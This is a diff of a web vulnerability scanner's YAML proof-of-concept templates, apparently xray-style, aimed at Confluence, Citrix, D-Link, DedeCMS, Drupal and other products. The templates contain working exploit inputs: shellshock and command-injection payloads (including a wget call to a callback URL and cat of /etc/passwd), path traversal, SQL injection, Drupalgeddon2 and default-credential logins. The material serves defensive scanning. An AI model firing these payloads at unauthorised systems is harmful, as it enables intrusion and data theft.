response.status == 200 && response.body.bcontains(b"This")
detail:
author: flyinbed
links:
- "https://mp.weixin.qq.com/s/iX2OasjynZ0MAvNTvIcmjg"
- "https://mp.weixin.qq.com/s/HMtAz6_unM1PrjfAzfwCUQ"

16
WebScan/pocs/aspcms-backend-leak.yml Normal file
View File

@ -0,0 +1,16 @@
name: poc-yaml-aspcms-backend-leak
rules:
- method: GET
path: /plug/oem/AspCms_OEMFun.asp
expression: |
response.status == 200 && "<script>alert".bmatches(response.body) && "top.location.href='(.*?)';".bmatches(response.body)
search: >-
(?P<path>(/(.*?).asp))
- method: GET
path: /{{path}}
expression: |
response.status == 200 && response.body.bcontains(b"username")
detail:
author: Hzllaga
links:
- https://www.onebug.org/wooyundata/65458.html

17
WebScan/pocs/atlassian-confluence-rce.yml
View File

@ -1,17 +0,0 @@
name: poc-yaml-atlassian-confluence-rce
set:
rand1: randomInt(1000, 9999)
rand2: randomInt(400, 9999)
rules:
- method: POST
path: "/pages/createpage-entervariables.action"
follow_redirects: true
body: |
queryString=alt3kx\u0027%2b#{{{rand1}}*{{rand2}}}%2b\u0027
expression: |
response.status == 200 && response.body.bcontains(bytes(string(rand1 * rand2)))
detail:
author: tangshoupu
info: Atlassian Confluence远程代码执行漏洞(CVE-2021-26084)
links:
- https://mp.weixin.qq.com/s/lVCT6JAA_BU9h4ISLlMNbQ

14
WebScan/pocs/bash-cve-2014-6271.yml Normal file
View File

@ -0,0 +1,14 @@
name: poc-yaml-bash-cve-2014-6271
set:
r1: randomInt(800000000, 1000000000)
r2: randomInt(800000000, 1000000000)
rules:
- method: GET
headers:
User-Agent: "() { :; }; echo; echo; /bin/bash -c 'expr {{r1}} + {{r2}}'"
follow_redirects: false
expression: response.body.bcontains(bytes(string(r1 + r2)))
detail:
author: neal1991(https://github.com/neal1991)
links:
- https://github.com/opsxcq/exploit-CVE-2014-6271

15
WebScan/pocs/cacti-weathermap-file-write.yml Normal file
View File

@ -0,0 +1,15 @@
name: poc-yaml-cacti-weathermap-file-write
rules:
- method: GET
path: >-
/plugins/weathermap/editor.php?plug=0&mapname=test.php&action=set_map_properties&param=&param2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=Created%3A%2B%25b%2B%25d%2B%25Y%2B%25H%3A%25M%3A%25S&map_linkdefaultwidth=7
follow_redirects: false
expression: response.status == 200
- method: GET
path: /plugins/weathermap/configs/test.php
follow_redirects: false
expression: response.status == 200 && response.body.bcontains(b"46ea1712d4b13b55b3f680cc5b8b54e8")
detail:
author: whynot(https://github.com/notwhy)
links:
- https://www.secpulse.com/archives/47690.html

9
WebScan/pocs/chinaunicom-modem-default-password.yml Normal file
View File

@ -0,0 +1,9 @@
name: poc-yaml-chinaunicom-modem-default-password
rules:
- method: POST
path: /cu.html
body: >-
frashnum=&action=login&Frm_Logintoken=1&Username=CUAdmin&Password=CUAdmin&Username=&Password=
follow_redirects: false
expression: |
response.status == 302 && response.headers["location"] == "/menu.gch"

11
WebScan/pocs/citrix-cve-2019-19781-path-traversal.yml Normal file
View File

@ -0,0 +1,11 @@
name: poc-yaml-citrix-cve-2019-19781-path-traversal
rules:
- method: GET
path: /vpn/../vpns/cfg/smb.conf
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(b"encrypt passwords") && response.body.bcontains(b"name resolve order")
detail:
author: su(https://suzzz112113.github.io/#blog)
links:
- https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/

18
WebScan/pocs/citrix-cve-2020-8191-xss.yml Normal file
View File

@ -0,0 +1,18 @@
name: poc-yaml-citrix-cve-2020-8191-xss
set:
r1: randomLowercase(6)
rules:
- method: POST
path: /menu/stapp
headers:
Content-Type: application/x-www-form-urlencoded
body: >-
sid=254&pe=1%2C2%2C3%2C4%2C5&appname=%0D%0A%3C%2Ftitle%3E%3Cscript%3Ealert%28{{r1}}%29%3B%3C%2Fscript%3E&au=1&username=nsroot
follow_redirects: true
expression: response.body.bcontains(bytes("<script>alert(" + r1 + ");</script>")) && response.body.bcontains(b"citrix")
detail:
author: JingLing(https://hackfun.org/)
links:
- https://support.citrix.com/article/CTX276688
- https://www.citrix.com/blogs/2020/07/07/citrix-provides-context-on-security-bulletin-ctx276688/
- https://dmaasland.github.io/posts/citrix.html

20
WebScan/pocs/citrix-cve-2020-8193-unauthorized.yml Normal file
View File

@ -0,0 +1,20 @@
name: poc-yaml-citrix-cve-2020-8193-unauthorized
set:
user: randomLowercase(8)
pass: randomLowercase(8)
rules:
- method: POST
path: "/pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1"
headers:
Content-Type: application/xml
X-NITRO-USER: '{{user}}'
X-NITRO-PASS: '{{pass}}'
body: <appfwprofile><login></login></appfwprofile>
follow_redirects: false
expression: >
response.status == 406 && "(?i)SESSID=\\w{32}".bmatches(bytes(response.headers["Set-Cookie"]))
detail:
author: bufsnake(https://github.com/bufsnake)
links:
- https://github.com/PR3R00T/CVE-2020-8193-Citrix-Scanner/blob/master/scanner.py
- https://blog.unauthorizedaccess.nl/2020/07/07/adventures-in-citrix-security-research.html

11
WebScan/pocs/citrix-xenmobile-cve-2020-8209.yml Normal file
View File

@ -0,0 +1,11 @@
name: poc-yaml-citrix-xenmobile-cve-2020-8209
rules:
- method: GET
path: /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd
follow_redirects: false
expression: |
response.status == 200 && response.content_type.contains("octet-stream") && "^root:[x*]:0:0:".bmatches(response.body)
detail:
author: B1anda0(https://github.com/B1anda0)
links:
- https://nvd.nist.gov/vuln/detail/CVE-2020-8209

13
WebScan/pocs/coldfusion-cve-2010-2861-lfi.yml Normal file
View File

@ -0,0 +1,13 @@
name: poc-yaml-coldfusion-cve-2010-2861-lfi
rules:
- method: GET
path: >-
/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en
follow_redirects: true
expression: |
response.status == 200 && response.body.bcontains(b"rdspassword=") && response.body.bcontains(b"encrypted=")
detail:
version: 8.0, 8.0.1, 9.0, 9.0.1 and earlier versions
author: sharecast
links:
- https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861

10
WebScan/pocs/confluence-cve-2015-8399.yml Normal file
View File

@ -0,0 +1,10 @@
name: poc-yaml-confluence-cve-2015-8399
rules:
- method: GET
path: /spaces/viewdefaultdecorator.action?decoratorName
follow_redirects: false
expression: response.status == 200 && response.body.bcontains(b"confluence-init.properties") && response.body.bcontains(b"View Default Decorator")
detail:
author: whynot(https://github.com/notwhy)
links:
- https://www.anquanke.com/vul/id/1150798

17
WebScan/pocs/confluence-cve-2019-3396-lfi.yml Normal file
View File

@ -0,0 +1,17 @@
name: poc-yaml-confluence-cve-2019-3396-lfi
rules:
- method: POST
path: /rest/tinymce/1/macro/preview
headers:
Content-Type: "application/json"
Host: localhost
Referer: http://localhost
body: >-
{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"../web.xml"}}}
follow_redirects: true
expression: |
response.status == 200 && response.body.bcontains(b"<param-name>contextConfigLocation</param-name>")
detail:
author: sharecast
links:
- https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2019-3396

15
WebScan/pocs/confluence-cve-2021-26084.yml Normal file
View File

@ -0,0 +1,15 @@
name: poc-yaml-confluence-cve-2021-26084
set:
r1: randomInt(100000, 999999)
r2: randomInt(100000, 999999)
rules:
- method: POST
path: /pages/createpage-entervariables.action?SpaceKey=x
body: |
queryString=\u0027%2b%7b{{r1}}%2B{{r2}}%7d%2b\u0027
expression: |
response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
detail:
author: Loneyer(https://github.com/Loneyers)
links:
- https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html

12
WebScan/pocs/confluence-cve-2021-26085-arbitrary-file-read.yml Normal file
View File

@ -0,0 +1,12 @@
name: poc-yaml-confluence-cve-2021-26085-arbitrary-file-read
set:
rand: randomLowercase(6)
rules:
- method: GET
path: /s/{{rand}}/_/;/WEB-INF/web.xml
follow_redirects: false
expression: response.status == 200 && response.body.bcontains(b"<display-name>Confluence</display-name>") && response.body.bcontains(b"com.atlassian.confluence.setup.ConfluenceAppConfig")
detail:
author: wulalalaaa(https://github.com/wulalalaaa)
links:
- https://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html

10
WebScan/pocs/consul-rexec-rce.yml Normal file
View File

@ -0,0 +1,10 @@
name: poc-yaml-consul-rexec-rce
rules:
- method: GET
path: /v1/agent/self
expression: |
response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"\"DisableRemoteExec\": false")
detail:
author: imlonghao(https://imlonghao.com/)
links:
- https://www.exploit-db.com/exploits/46073

10
WebScan/pocs/consul-service-rce.yml Normal file
View File

@ -0,0 +1,10 @@
name: poc-yaml-consul-service-rce
rules:
- method: GET
path: /v1/agent/self
expression: |
response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"\"EnableScriptChecks\": true") || response.body.bcontains(b"\"EnableRemoteScriptChecks\": true")
detail:
author: imlonghao(https://imlonghao.com/)
links:
- https://www.exploit-db.com/exploits/46074

16
WebScan/pocs/couchcms-cve-2018-7662.yml Normal file
View File

@ -0,0 +1,16 @@
name: poc-yaml-couchcms-cve-2018-7662
rules:
- method: GET
path: /includes/mysql2i/mysql2i.func.php
follow_redirects: false
expression: >
response.status == 200 && response.body.bcontains(b"mysql2i.func.php on line 10") && response.body.bcontains(b"Fatal error: Cannot redeclare mysql_affected_rows() in")
- method: GET
path: /addons/phpmailer/phpmailer.php
follow_redirects: false
expression: >
response.status == 200 && response.body.bcontains(b"phpmailer.php on line 10") && response.body.bcontains(b"Fatal error: Call to a menber function add_event_listener() on a non-object in")
detail:
author: we1x4n(https://we1x4n.github.io/)
links:
- https://github.com/CouchCMS/CouchCMS/issues/46

24
WebScan/pocs/couchdb-cve-2017-12635.yml Normal file
View File

@ -0,0 +1,24 @@
name: poc-yaml-couchdb-cve-2017-12635
set:
r1: randomLowercase(32)
rules:
- method: PUT
path: '/_users/org.couchdb.user:{{r1}}'
headers:
Content-Type: application/json
Content-Length: '192'
body: |-
{
"type": "user",
"name": "{{r1}}",
"roles": ["_admin"],
"roles": [],
"password": "fVyuyAECgYEAhgJzkPO1sTV1Dvs5bvls4tyVAsLy2I7wHKWJvJdDUpox2TnCMFT9"
}
follow_redirects: false
expression: |
response.status == 201 && response.body.bcontains(bytes("org.couchdb.user:" + r1))
detail:
author: j4ckzh0u(https://github.com/j4ckzh0u)
links:
- https://github.com/vulhub/vulhub/tree/master/couchdb/CVE-2017-12635

11
WebScan/pocs/couchdb-unauth.yml Normal file
View File

@ -0,0 +1,11 @@
name: poc-yaml-couchdb-unauth
rules:
- method: GET
path: /_config
follow_redirects: false
expression: >
response.status == 200 && response.body.bcontains(b"httpd_design_handlers") && response.body.bcontains(b"external_manager") && response.body.bcontains(b"replicator_manager")
detail:
author: FiveAourThe(https://github.com/FiveAourThe)
links:
- https://www.seebug.org/vuldb/ssvid-91597

20
WebScan/pocs/craftcms-seomatic-cve-2020-9757-rce.yml Normal file
View File

@ -0,0 +1,20 @@
name: poc-yaml-craftcms-seomatic-cve-2020-9757-rce
set:
r1: randomInt(40000, 44800)
r2: randomInt(40000, 44800)
groups:
poc1:
- method: GET
path: /actions/seomatic/meta-container/meta-link-container/?uri={{{{r1}}*'{{r2}}'}}
expression: |
response.status == 200 && response.body.bcontains(bytes("MetaLinkContainer")) && response.body.bcontains(bytes("canonical")) && response.body.bcontains(bytes(string(r1 * r2)))
poc2:
- method: GET
path: /actions/seomatic/meta-container/all-meta-containers?uri={{{{r1}}*'{{r2}}'}}
expression: |
response.status == 200 && response.body.bcontains(bytes("MetaLinkContainer")) && response.body.bcontains(bytes("canonical")) && response.body.bcontains(bytes(string(r1 * r2)))
detail:
author: x1n9Qi8
links:
- http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202003-181
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9757

14
WebScan/pocs/datang-ac-default-password-cnvd-2021-04128.yml Normal file
View File

@ -0,0 +1,14 @@
name: poc-yaml-datang-ac-default-password-cnvd-2021-04128
rules:
- method: POST
path: /login.cgi
follow_redirects: false
body: >-
user=admin&password1=%E8%AF%B7%E8%BE%93%E5%85%A5%E5%AF%86%E7%A0%81&password=123456&Submit=%E7%AB%8B%E5%8D%B3%E7%99%BB%E5%BD%95
expression: |
response.status == 200 && response.headers["set-cookie"].contains("ac_userid=admin,ac_passwd=") && response.body.bcontains(b"window.open('index.htm?_")
detail:
author: B1anda0(https://github.com/B1anda0)
links:
- https://www.cnvd.org.cn/flaw/show/CNVD-2021-04128

22
WebScan/pocs/dedecms-carbuyaction-fileinclude.yml Normal file
View File

@ -0,0 +1,22 @@
name: poc-yaml-dedecms-carbuyaction-fileinclude
rules:
- method: GET
path: /plus/carbuyaction.php?dopost=return&code=../../
headers:
Cookie: code=alipay
follow_redirects: true
expression: |
response.status == 200
- method: GET
path: /plus/carbuyaction.php?dopost=return&code=../../
headers:
Cookie: code=cod
follow_redirects: true
expression: |
response.status == 200 && response.body.bcontains(bytes("Cod::respond()"))
detail:
author: harris2015(https://github.com/harris2015)
Affected Version: "DedeCmsV5.x"
links:
- https://www.cnblogs.com/milantgh/p/3615986.html

10
WebScan/pocs/dedecms-cve-2018-6910.yml Normal file
View File

@ -0,0 +1,10 @@
name: poc-yaml-dedecms-cve-2018-6910
rules:
- method: GET
path: /include/downmix.inc.php
expression: |
response.status == 200 && response.body.bcontains(bytes("Fatal error")) && response.body.bcontains(bytes("downmix.inc.php")) && response.body.bcontains(bytes("Call to undefined function helper()"))
detail:
author: PickledFish(https://github.com/PickledFish)
links:
- https://github.com/kongxin520/DedeCMS/blob/master/DedeCMS_5.7_Bug.md

15
WebScan/pocs/dedecms-cve-2018-7700-rce.yml Normal file
View File

@ -0,0 +1,15 @@
name: poc-yaml-dedecms-cve-2018-7700-rce
set:
r: randomInt(2000000000, 2100000000)
rules:
- method: GET
path: >-
/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5{{r}};{/dede:field}
follow_redirects: true
expression: |
response.status == 200 && response.body.bcontains(bytes(md5(string(r))))
detail:
author: harris2015(https://github.com/harris2015)
Affected Version: "V5.7SP2正式版(2018-01-09)"
links:
- https://xz.aliyun.com/t/2224

26
WebScan/pocs/dedecms-guestbook-sqli.yml Normal file
View File

@ -0,0 +1,26 @@
name: poc-yaml-dedecms-guestbook-sqli
set:
r: randomInt(800000000, 1000000000)
rules:
- method: GET
path: /plus/guestbook.php
follow_redirects: true
expression: |
response.status == 200
search: action=admin&id=(?P<articleid>\d{1,20})
- method: GET
path: /plus/guestbook.php?action=admin&job=editok&id={{articleid}}&msg=',msg=@`'`,msg=(selecT md5({{r}})),email='
follow_redirects: true
expression: |
response.status == 200
- method: GET
path: /plus/guestbook.php
follow_redirects: true
expression: |
response.status == 200 && response.body.bcontains(bytes(md5(string(r))))
detail:
author: harris2015(https://github.com/harris2015)
Affected Version: "5.7"
links:
- https://blog.csdn.net/god_7z1/article/details/8180454

15
WebScan/pocs/dedecms-membergroup-sqli.yml Normal file
View File

@ -0,0 +1,15 @@
name: poc-yaml-dedecms-membergroup-sqli
set:
r: randomInt(800000000, 1000000000)
rules:
- method: GET
path: >-
/member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5({{r}})+--+@`'`
follow_redirects: true
expression: |
response.status == 200 && response.body.bcontains(bytes(md5(string(r))))
detail:
author: harris2015(https://github.com/harris2015)
Affected Version: "5.6,5.7"
links:
- http://www.dedeyuan.com/xueyuan/wenti/1244.html

13
WebScan/pocs/dedecms-url-redirection.yml Normal file
View File

@ -0,0 +1,13 @@
name: poc-yaml-dedecms-url-redirection
rules:
- method: GET
path: >-
/plus/download.php?open=1&link=aHR0cHM6Ly93d3cuZHUxeDNyMTIuY29t
follow_redirects: false
expression: >
response.status == 302 && response.headers["location"] == "https://www.du1x3r12.com"
detail:
author: cc_ci(https://github.com/cc8ci)
Affected Version: "V5.7 sp1"
links:
- https://blog.csdn.net/ystyaoshengting/article/details/82734888

14
WebScan/pocs/discuz-v72-sqli.yml Normal file
View File

@ -0,0 +1,14 @@
name: poc-yaml-discuz-v72-sqli
rules:
- method: GET
path: >-
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(user,0x3a,md5(1234),0x3a)%20from%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
follow_redirects: false
expression: >
response.status == 200 && response.body.bcontains(b"81dc9bdb52d04dc20036dbd8313ed055") && response.body.bcontains(b"Discuz! info</b>: MySQL Query Error")
detail:
author: leezp
Affected Version: "discuz <=v7.2"
vuln_url: "/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20"
links:
- https://blog.csdn.net/weixin_40709439/article/details/82780606

11
WebScan/pocs/discuz-wechat-plugins-unauth.yml Normal file
View File

@ -0,0 +1,11 @@
name: poc-yaml-discuz-wechat-plugins-unauth
rules:
- method: GET
path: '/plugin.php?id=wechat:wechat&ac=wxregister'
follow_redirects: false
expression: |
response.status == 302 && "set-cookie" in response.headers && response.headers["set-cookie"].contains("auth") && "location" in response.headers && response.headers["location"].contains("wsq.discuz.com")
detail:
author: JrD
links:
- https://gitee.com/ComsenzDiscuz/DiscuzX/issues/IPRUI

17
WebScan/pocs/discuz-wooyun-2010-080723.yml Normal file
View File

@ -0,0 +1,17 @@
name: poc-yaml-discuz-wooyun-2010-080723
set:
rand: randomInt(200000000, 210000000)
rules:
- method: GET
path: >-
/viewthread.php?tid=10
headers:
Cookie: GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Bsearcharray%5D=/.*/eui; GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Breplacearray%5D=print_r(md5({{rand}}));
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(bytes(md5(string(rand))))
detail:
version: Discuz 7.x/6.x
author: Loneyer
links:
- https://github.com/vulhub/vulhub/tree/master/discuz/wooyun-2010-080723

17
WebScan/pocs/dlink-850l-info-leak.yml Normal file
View File

@ -0,0 +1,17 @@
name: poc-yaml-dlink-850l-info-leak
rules:
- method: POST
path: /hedwig.cgi
headers:
Content-Type: text/xml
Cookie: uid=R8tBjwtFc8
body: |-
<?xml version="1.0" encoding="utf-8"?><postxml><module><service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service></module></postxml>
follow_redirects: false
expression: >
response.status == 200 && response.content_type.contains("xml") && response.body.bcontains(b"</usrid>") && response.body.bcontains(b"</password>") && response.body.bcontains(b"<result>OK</result>")
detail:
author: cc_ci(https://github.com/cc8ci)
Affected Version: "Dir-850L"
links:
- https://xz.aliyun.com/t/2941

19
WebScan/pocs/dlink-cve-2019-16920-rce.yml Normal file
View File

@ -0,0 +1,19 @@
name: poc-yaml-dlink-cve-2019-16920-rce
set:
reverse: newReverse()
reverseURL: reverse.url
rules:
- method: POST
path: /apply_sec.cgi
headers:
Content-Type: application/x-www-form-urlencoded
body: >-
html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20{{reverseURL}}
follow_redirects: true
expression: |
response.status == 200 && reverse.wait(5)
detail:
author: JingLing(https://hackfun.org/)
links:
- https://www.anquanke.com/post/id/187923
- https://medium.com/@80vul/determine-the-device-model-affected-by-cve-2019-16920-by-zoomeye-bf6fec7f9bb3

2
WebScan/pocs/dlink-cve-2019-17506.yml
View File

@ -7,7 +7,7 @@ rules:
body: SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a
follow_redirects: false
expression: >
response.status == 200 && response.body.bcontains(b"<name>") && response.body.bcontains(b"<password>")
response.status == 200 && response.content_type.contains("xml") && response.body.bcontains(b"<name>") && response.body.bcontains(b"<password>")
detail:
author: l1nk3r,Huasir(https://github.com/dahua966/)
links:

3
WebScan/pocs/dlink-cve-2020-25078-account-disclosure.yml
View File

@ -5,7 +5,8 @@ rules:
/config/getuser?index=0
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(b"name=admin") && response.body.bcontains(b"pass=") && response.headers["Content-Type"].contains("text/plain")
response.status == 200 && response.headers["Content-Type"].contains("text/plain") && response.body.bcontains(b"name=admin") && response.body.bcontains(b"pass=")
detail:
author: kzaopa(https://github.com/kzaopa)
links:

2
WebScan/pocs/dlink-cve-2020-9376-dump-credentials.yml
View File

@ -7,7 +7,7 @@ rules:
body: >-
SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1
expression: >
response.status == 200 && response.body.bcontains(b"<name>Admin</name>") && response.body.bcontains(b"</usrid>") && response.body.bcontains(b"</password>")
response.status == 200 && response.content_type.contains("xml") && response.body.bcontains(b"<name>Admin</name>") && response.body.bcontains(b"</usrid>") && response.body.bcontains(b"</password>")
detail:
author: x1n9Qi8
Affected Version: "Dlink DIR-610"

9
WebScan/pocs/dlink-dcs-info-leak.yml
View File

@ -1,9 +0,0 @@
name: poc-yaml-dlink-dcs-info-leak
rules:
- method: GET
path: /config/getuser?index=0
expression: response.status == 200 && response.body.bcontains(b"name=") && response.body.bcontains(b"pass=") && response.body.bcontains(b"priv=")
detail:
author: jingling(https://github.com/shmilylty)
links:
- https://mp.weixin.qq.com/s/cG868wc7dmwxFslcwlgDpw

25
WebScan/pocs/dlink-dsl-2888a-rce.yml Normal file
View File

@ -0,0 +1,25 @@
name: poc-yaml-dlink-dsl-2888a-rce
rules:
- method: GET
path: /page/login/login.html
follow_redirects: false
expression: |
response.status == 200 && response.content_type.contains("text/html") && response.body.bcontains(b"var ModelName=\"DSL-2888A\";")
- method: POST
path: /
body: username=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
headers:
Content-Type: application/x-www-form-urlencoded
follow_redirects: false
expression: |
response.status == 302 && response.headers["location"] == "/page/login/login_fail.html"
- method: GET
path: /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=id
follow_redirects: false
expression: |
response.status == 200 && response.content_type.contains("text/html") && response.body.bcontains(b"uid=0(admin) gid=0(admin)")
detail:
author: mvhz81
info: dlink-dsl-2888a CVE-2020-24579(Insufficient Authentication) + Hidden Functionality (CVE-2020-24581) = RCE
links:
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/d-link-multiple-security-vulnerabilities-leading-to-rce/

2
WebScan/pocs/docker-api-unauthorized-rce.yml
View File

@ -4,7 +4,7 @@ rules:
path: /info
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(b"KernelVersion") && response.body.bcontains(b"RegistryConfig") && response.body.bcontains(b"DockerRootDir")
response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"KernelVersion") && response.body.bcontains(b"RegistryConfig") && response.body.bcontains(b"DockerRootDir")
detail:
author: j4ckzh0u(https://github.com/j4ckzh0u)

21
WebScan/pocs/dotnetcms-sqli.yml Normal file
View File

@ -0,0 +1,21 @@
name: poc-yaml-dotnetcms-sqli
set:
r1: randomInt(800000000, 1000000000)
r2: randomInt(1, 100)
rules:
- method: GET
path: /user/City_ajax.aspx
follow_redirects: false
expression: |
response.status == 200
- method: GET
path: >-
/user/City_ajax.aspx?CityId={{r2}}'union%20select%20sys.fn_sqlvarbasetostr(HashBytes('MD5','{{r1}}')),2--
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(bytes(md5(string(r1))))
detail:
Affected Version: "v1.0~v2.0"
links:
- https://www.cnblogs.com/rebeyond/p/4951418.html
- http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0150742

15
WebScan/pocs/draytek-cve-2020-8515.yml Normal file
View File

@ -0,0 +1,15 @@
name: poc-yaml-draytek-cve-2020-8515
rules:
- method: POST
path: /cgi-bin/mainfunction.cgi
headers:
Content-Type: text/plain; charset=UTF-8
body: >-
action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2f/etc/passwd%26id%26pwd&loginUser=a&loginPwd=a
expression: >
response.status == 200 && response.body.bcontains(b"uid") && response.body.bcontains(b"gid") && "root:[x*]:0:0:".bmatches(response.body)
detail:
author: Soveless(https://github.com/Soveless)
Affected Version: "Vigor2960, Vigor300B, Vigor3900 < v1.5.1, VigorSwitch20P2121, VigorSwitch20G1280, VigorSwitch20P1280, VigorSwitch20G2280, VigorSwitch20P2280 <= v2.3.2"
links:
- https://github.com/imjdl/CVE-2020-8515-PoC

38
WebScan/pocs/drupal-cve-2018-7600-rce.yml
View File

@ -2,15 +2,35 @@ name: poc-yaml-drupal-cve-2018-7600-rce
set:
r1: randomLowercase(4)
r2: randomLowercase(4)
rules:
- method: POST
path: "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=printf&mail[#type]=markup&mail[#markup]={{r1}}%25%25{{r2}}
expression: |
response.body.bcontains(bytes(r1 + "%" + r2))
groups:
drupal8:
- method: POST
path: "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=printf&mail[#type]=markup&mail[#markup]={{r1}}%25%25{{r2}}
expression: |
response.body.bcontains(bytes(r1 + "%" + r2))
drupal7:
- method: POST
path: "/?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]={{r1}}%25%25{{r2}}"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail+new+Password
search: |
name="form_build_id"\s+value="(?P<build_id>.+?)"
expression: |
response.status == 200
- method: POST
path: "/?q=file%2Fajax%2Fname%2F%23value%2F{{build_id}}"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
form_build_id={{build_id}}
expression: |
response.body.bcontains(bytes(r1 + "%" + r2))
detail:
links:
- https://github.com/dreadlocked/Drupalgeddon2

29
WebScan/pocs/drupal-cve-2018-7600-rce2.yml
View File

@ -1,29 +0,0 @@
name: poc-yaml-drupal-cve-2018-7600-rce
set:
r1: randomLowercase(4)
r2: randomLowercase(4)
rules:
- method: POST
path: "/?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]={{r1}}%25%25{{r2}}"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail+new+Password
search: |
name="form_build_id"\s+value="(?P<build_id>.+?)"
expression: |
response.status == 200
- method: POST
path: "/?q=file%2Fajax%2Fname%2F%23value%2F{{build_id}}"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
form_build_id={{build_id}}
expression: |
response.body.bcontains(bytes(r1 + "%" + r2))
detail:
links:
- https://github.com/dreadlocked/Drupalgeddon2
- https://paper.seebug.org/567/
test:
target: http://cve-2018-7600-8-x.vulnet:8080/

2
WebScan/pocs/drupal-cve-2019-6340.yml
View File

@ -25,7 +25,7 @@ rules:
}
follow_redirects: true
expression: |
response.status == 403 && response.body.bcontains(bytes(r1 + "%" + r2))
response.status == 403 && response.content_type.contains("hal+json") && response.body.bcontains(bytes(r1 + "%" + r2))
detail:
author: thatqier
links:

28
WebScan/pocs/drupal-drupal7geddon2-rce.yml
View File

@ -1,28 +0,0 @@
name: poc-yaml-drupal-drupalgeddon2-rce # nolint[:namematch]
set:
r1: randomLowercase(4)
r2: randomLowercase(4)
rules:
- method: POST
path: "/?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]={{r1}}%25%25{{r2}}"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail+new+Password
search: |
name="form_build_id"\s+value="(?P<build_id>.+?)"
expression: |
response.status == 200
- method: POST
path: "/?q=file%2Fajax%2Fname%2F%23value%2F{{build_id}}"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
form_build_id={{build_id}}
expression: |
response.body.bcontains(bytes(r1 + "%" + r2))
detail:
drupal_version: 7
links:
- https://github.com/dreadlocked/Drupalgeddon2
- https://paper.seebug.org/567/

20
WebScan/pocs/drupal-drupal8geddon2-rce.yml
View File

@ -1,20 +0,0 @@
name: poc-yaml-drupal-drupalgeddon2-rce # nolint[:namematch]
set:
r1: randomLowercase(4)
r2: randomLowercase(4)
rules:
- method: POST
path: "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=printf&mail[#type]=markup&mail[#markup]={{r1}}%25%25{{r2}}
expression: |
response.body.bcontains(bytes(r1 + "%" + r2))
detail:
drupal_version: 8
links:
- https://github.com/dreadlocked/Drupalgeddon2
- https://paper.seebug.org/567/
test:
target: http://cve-2018-7600-8-x.vulnet:8080/

20
WebScan/pocs/dubbo-admin-default-password.yml Normal file
View File

@ -0,0 +1,20 @@
name: poc-yaml-dubbo-admin-default-password
groups:
root:
- method: GET
path: /
headers:
Authorization: Basic cm9vdDpyb290
expression: |
